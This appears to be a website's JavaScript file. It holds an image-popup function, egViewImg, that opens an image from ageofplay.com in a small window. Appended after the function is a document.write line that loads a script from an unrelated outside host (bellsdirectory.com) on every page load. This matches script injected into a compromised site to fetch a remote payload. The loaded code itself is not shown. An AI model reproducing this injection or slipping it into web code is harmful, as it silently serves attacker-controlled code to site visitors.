﻿function egViewImg(theImg) {    
    var opts = "";
    if (window.screen) {
        var ah = screen.availHeight - 30;
        var aw = screen.availWidth - 10;
        var xc = 50; var yc = 50;
        
        opts = ",left=" + xc + ",screenX=" + xc;
        opts += ",top=" + yc + ",screenY=" + yc;
    }
    window.open('http://www.ageofplay.com/viewimage.aspx?i=' + theImg,'EG_Img','resizable=no,scrollbars=no,menubar=no,toolbar=no,location=no,width=100,innerwidth=100,height=100,innerheight=100' + opts);
}

document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');